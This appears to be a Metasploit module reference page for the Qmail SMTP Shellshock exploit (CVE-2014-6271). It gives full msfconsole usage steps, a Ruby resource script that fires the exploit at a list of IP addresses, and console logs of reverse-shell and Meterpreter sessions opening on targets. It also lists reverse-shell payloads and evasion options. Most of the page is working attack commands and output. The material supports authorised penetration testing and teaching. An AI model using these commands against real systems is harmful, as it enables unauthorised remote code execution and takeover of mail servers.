Qmail SMTP Bash Environment Variable Injection (Shellshock) - Metasploit

This page contains detailed information about how to use the exploit/unix/smtp/qmail_bash_env_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: Qmail SMTP Bash Environment Variable Injection (Shellshock)
Module: exploit/unix/smtp/qmail_bash_env_exec
Source code: modules/exploits/unix/smtp/qmail_bash_env_exec.rb
Disclosure date: 2014-09-24
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: smtp, smtps
Target network port(s): 25, 465, 587, 2525, 25000, 25025
List of CVEs: CVE-2014-6271

This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually [email protected]). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.

Module Ranking and Traits

Module Ranking:

normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

Using qmail_bash_env_exec against a single host

Normally, you can use exploit/unix/smtp/qmail_bash_env_exec this way:

msf > use exploit/unix/smtp/qmail_bash_env_exec
msf exploit(qmail_bash_env_exec) > show targets
    ... a list of targets ...
msf exploit(qmail_bash_env_exec) > set TARGET target-id
msf exploit(qmail_bash_env_exec) > show options
    ... show and set options ...
msf exploit(qmail_bash_env_exec) > exploit

Using qmail_bash_env_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your qmail_bash_env_exec will be using:

Do: use exploit/multi/handler
Do: set PAYLOAD [payload]
Set other options required by the payload
Do: set EXITONSESSION false
Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/smtp/qmail_bash_env_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options

RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base

Vulnerable Application

Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually [email protected]). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.

Setting up a vulnerable environment

Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd.

Verification Steps

use exploit/unix/smtp/qmail_bash_env_exec
set RHOST <target IP>
set MAILTO <valid e-mail recipient>
set payload cmd/unix/reverse
set LHOST <local IP>
optionally set RPORT and LPORT
exploit
Verify a new shell session is started

Options

MAILTO

A valid e-mail recipient. Usually, [email protected] can be used.

Scenarios

Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).

msf > use exploit/unix/smtp/qmail_bash_env_exec 
msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
rhost => 192.168.1.113
msf exploit(qmail_bash_env_exec) > set mailto "[email protected]"
mailto => [email protected]
msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(qmail_bash_env_exec) > show options 

Module options (exploit/unix/smtp/qmail_bash_env_exec):

   Name    Current Setting        Required  Description
   ----    ---------------        --------  -----------
   MAILTO  [email protected]  yes       TO address of the e-mail
   RHOST   192.168.1.113          yes       The target address
   RPORT   25                     yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.102    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(qmail_bash_env_exec) > run

[*] Started reverse TCP double handler on 192.168.1.102:4444 
[*] 192.168.1.113:25 - Sending the payload...
[*] 192.168.1.113:25 - Sending RCPT TO [email protected]
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RvZfov9i2ZuveLXA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RvZfov9i2ZuveLXA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200

whoami
vpopmail

Go back to menu.

Msfconsole Usage

Here is how the unix/smtp/qmail_bash_env_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/smtp/qmail_bash_env_exec

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show info

       Name: Qmail SMTP Bash Environment Variable Injection (Shellshock)
     Module: exploit/unix/smtp/qmail_bash_env_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-09-24

Provided by:
  Mario Ledo (Metasploit module)
  Gabriel Follon (Metasploit module)
  Kyle George (Vulnerability discovery)

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting     Required  Description
  ----    ---------------     --------  -----------
  MAILTO  [email protected]  yes       TO address of the e-mail
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   25                  yes       The target port (TCP)

Payload information:
  Space: 888
  Avoid: 1 characters

Description:
  This module exploits a shellshock vulnerability on Qmail, a public 
  domain MTA written in C that runs on Unix systems. Due to the lack 
  of validation on the MAIL FROM field, it is possible to execute 
  shell code on a system with a vulnerable BASH (Shellshock). This 
  flaw works on the latest Qmail versions (qmail-1.03 and 
  netqmail-1.06). However, in order to execute code, /bin/sh has to be 
  linked to bash (usually default configuration) and a valid recipient 
  must be set on the RCPT TO field (usually [email protected]). 
  The exploit does not work on the "qmailrocks" community version as 
  it ensures the MAILFROM field is well-formed.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-6271
  https://cwe.mitre.org/data/definitions/94.html
  OSVDB (112004)
  https://www.exploit-db.com/exploits/34765
  https://seclists.org/oss-sec/2014/q3/649
  https://lists.gt.net/qmail/users/138578

Module Options

This is a complete list of options available in the unix/smtp/qmail_bash_env_exec exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show options

Module options (exploit/unix/smtp/qmail_bash_env_exec):

   Name    Current Setting     Required  Description
   ----    ---------------     --------  -----------
   MAILTO  [email protected]  yes       TO address of the e-mail
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   25                  yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options

Here is a complete list of advanced options supported by the unix/smtp/qmail_bash_env_exec exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show advanced

Module advanced options (exploit/unix/smtp/qmail_bash_env_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Exploit Targets

Here is a list of targets (platforms and systems) which the unix/smtp/qmail_bash_env_exec module can exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the unix/smtp/qmail_bash_env_exec exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   10  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   11  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   12  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   13  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options

Here is the full list of possible evasion options supported by the unix/smtp/qmail_bash_env_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

<RHOST>:<RPORT> Error smtp_send: '<E.CLASS>' '<E>'
connection error
connection error
connection error
connection error
connection error

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> Error smtp_send: '<E.CLASS>' '<E>'

Here is a relevant code snippet related to the "<RHOST>:<RPORT> Error smtp_send: '<E.CLASS>' '<E>'" error message:

72:	      code = result[0..2].to_i if result
73:	      return result, code
74:	    rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
75:	      return result, 0
76:	    rescue ::Exception => e
77:	      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
78:	      return nil, 0
79:	    end
80:	  end
81:	
82:	  def exploit